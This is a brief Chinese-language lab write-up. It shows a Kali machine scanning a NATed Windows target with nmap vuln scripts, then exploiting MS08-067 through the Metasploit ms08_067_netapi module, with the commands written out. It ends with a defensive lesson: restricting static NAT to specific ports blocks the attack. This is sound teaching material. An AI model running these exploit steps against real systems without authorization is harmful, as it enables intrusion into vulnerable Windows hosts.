外网渗透
1. 搭建环境
1.1 实验拓扑
1.2 目标
使用外部的kali(192.168.168.137)作为攻击方,攻击内网的靶子机(192.168.100.3)
2. 渗透主机
2.1 扫描主机
外网访问内网在路由器上做了静态nat,用kali扫描靶子机映射在外网的ip地址192.168.168.151
nmap -sC --script=vuln 192.168.168.151
可以发现存在ms08-067号漏洞
2.2 渗透主机
使用Metasploit Framework工具寻找攻击工具
search ms08-067
使用攻击工具并设置攻击参数
use exploit/windows/smb/ms08-067_netapi
show options
set rhost 192.168.168.151
启动攻击工具
run
进入这个界面就已经攻击成功了,可以直接查看靶子机的ip地址
3. 小结
静态nat放开全部端口是不安全的,当我们需要用到什么服务时我们最好只打开这些服务的端口。如果我们将静态nat设置详细到端口,可以发现无法攻击成功了,这是因为我们利用的漏洞是smb服务端口号是445,而现在445号端口没有加入静态nat的映射中
ip nat inside source static tcp 192.168.100.3 80 interface g0/1 80
修改之后可以发现我们无法再利用这个漏洞进行攻击了